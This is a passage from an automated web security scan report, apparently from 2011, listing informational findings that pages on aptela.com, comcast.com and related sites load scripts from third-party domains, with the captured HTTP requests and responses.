Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
</p>

   
<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>    

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.49. http://www.aptela.com/mainstylesheet.css/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /mainstylesheet.css/

Issue detail

The response (a 404 page served as a full HTML document) dynamically includes the following scripts from other domains; the protocol-relative authorize.net include is fetched over plaintext http on this http page:

http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025
//verify.authorize.net/anetseal/seal.js
https://lct.salesforce.com/sfga.js
http://munchkin.marketo.net/munchkin.js

Request

GET /mainstylesheet.css/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://support.aptela.com:9000/tools/ResetPassword.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326402; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326409; expires=Wed, 05-Sep-2012 12:26:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 15669
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> Pag
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- ClickTale end of Bottom part -->


<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...

16.50. http://www.aptela.com/misc/privacy-policy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /misc/privacy-policy/

Issue detail

The response dynamically includes the following scripts from other domains; the protocol-relative authorize.net include is fetched over plaintext http on this http page:

http://use.typekit.com/apb3goi.js
http://platform.twitter.com/widgets.js
http://apis.google.com/js/plusone.js
http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025
//verify.authorize.net/anetseal/seal.js
https://lct.salesforce.com/sfga.js
http://munchkin.marketo.net/munchkin.js

Request

GET /misc/privacy-policy/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326382; expires=Wed, 05-Sep-2012 12:26:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fmisc%2F404%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2F33c420cd2ee5ef0c134a240a%2FT2V1%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2F33c420cd2c9d489cd0318b99%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:22 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 20963
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title>Privacy Poli
...[SNIP]...
<meta name="robots" content="noodp, noydir" />

<script type="text/javascript" src="http://use.typekit.com/apb3goi.js"></script>
...[SNIP]...
</script>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- ClickTale end of Bottom part -->


<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...

16.51. http://www.aptela.com/my-account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The response dynamically includes the following scripts from other domains; the protocol-relative authorize.net include is fetched over plaintext http on this http page:

http://use.typekit.com/apb3goi.js
http://platform.twitter.com/widgets.js
http://apis.google.com/js/plusone.js
http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025
//verify.authorize.net/anetseal/seal.js
https://lct.salesforce.com/sfga.js
http://munchkin.marketo.net/munchkin.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
<meta name="robots" content="noodp, noydir" />

<script type="text/javascript" src="http://use.typekit.com/apb3goi.js"></script>
...[SNIP]...
</script>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- /wrapper -->
   

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.52. http://www.aptela.com/my-account/login-error/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The response dynamically includes the following scripts from other domains; the protocol-relative authorize.net include is fetched over plaintext http on this http page:

http://use.typekit.com/apb3goi.js
http://platform.twitter.com/widgets.js
http://apis.google.com/js/plusone.js
http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025
//verify.authorize.net/anetseal/seal.js
https://lct.salesforce.com/sfga.js
http://munchkin.marketo.net/munchkin.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
<meta name="robots" content="noodp, noydir" />

<script type="text/javascript" src="http://use.typekit.com/apb3goi.js"></script>
...[SNIP]...
</script>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- /wrapper -->
   

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.53. http://www.comcast.com/Corporate/Customers/custcare.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Corporate/Customers/custcare.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://comcast.vo.llnwd.net/d1/u/ccom/prod/MediaLibrary/1/1/LimeLight/Video/swfobject.js
http://comcast.vo.llnwd.net/d1/u/ccom/prod/MediaLibrary/1/1/LimeLight/Video/videoPlayerFunctions.js

Request

GET /Corporate/Customers/custcare.html HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315331731|PC#1315327839174-766376.19#1316539471|check#true#1315329931; fsr.s={"v":1,"pv":4,"lc":{"d0":{"v":4,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; fsr.a=1315329871900; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331670936%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331671920%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 18 Aug 2011 20:12:14 GMT
Accept-Ranges: bytes
ETag: "023a51ee35dcc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:32 GMT
Connection: close
Content-Length: 25439

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><ti
...[SNIP]...
<DIV id=playlink style="Z-INDEX: 2; LEFT: 0px; WIDTH: 300px; POSITION: absolute; TOP: 0px; HEIGHT: 226px" align=left>
<SCRIPT src="http://comcast.vo.llnwd.net/d1/u/ccom/prod/MediaLibrary/1/1/LimeLight/Video/swfobject.js" type=text/javascript></SCRIPT>

<SCRIPT src="http://comcast.vo.llnwd.net/d1/u/ccom/prod/MediaLibrary/1/1/LimeLight/Video/videoPlayerFunctions.js" type=text/javascript></SCRIPT>
...[SNIP]...

16.54. http://www.comcast.com/Movers/Move.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Movers/Move.cspx

Issue detail

The response dynamically includes the following script from another domain (URL shown with the HTML entities decoded, as the browser requests it):

http://www.xfinity.com/js-api/compressed/xpbar.js?id=xbardiv&highlight=comcastcom&version=2

Request

GET /Movers/Move.cspx HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331605|check#true#1315329805|PC#1315327839174-766376.19#1316539345; bn_u=6923713561343025788; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331544344%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331545589%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329851040'%255D%255D%7C1473182651040%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 54374
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:24:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <script type="text
...[SNIP]...
<div id="wrapper">
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2" type="text/javascript">..</script>
...[SNIP]...

16.55. https://www.comcast.com/Localization/Localize.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315329639203%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 11:59:19 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24148
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...
<div id="main">
   
    <script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2" type="text/javascript">..</script>
...[SNIP]...

16.56. https://www.comcastsupport.com/ChatEntry/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ChatEntry/ HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="https://www.comcast.com/includes/omniture/s_code.js"></script>
...[SNIP]...

16.57. https://www.comcastsupport.com/chatentry/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /chatentry/Default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /chatentry/Default.aspx HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="https://www.comcast.com/includes/omniture/s_code.js"></script>
...[SNIP]...

16.58. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286 HTTP/1.1
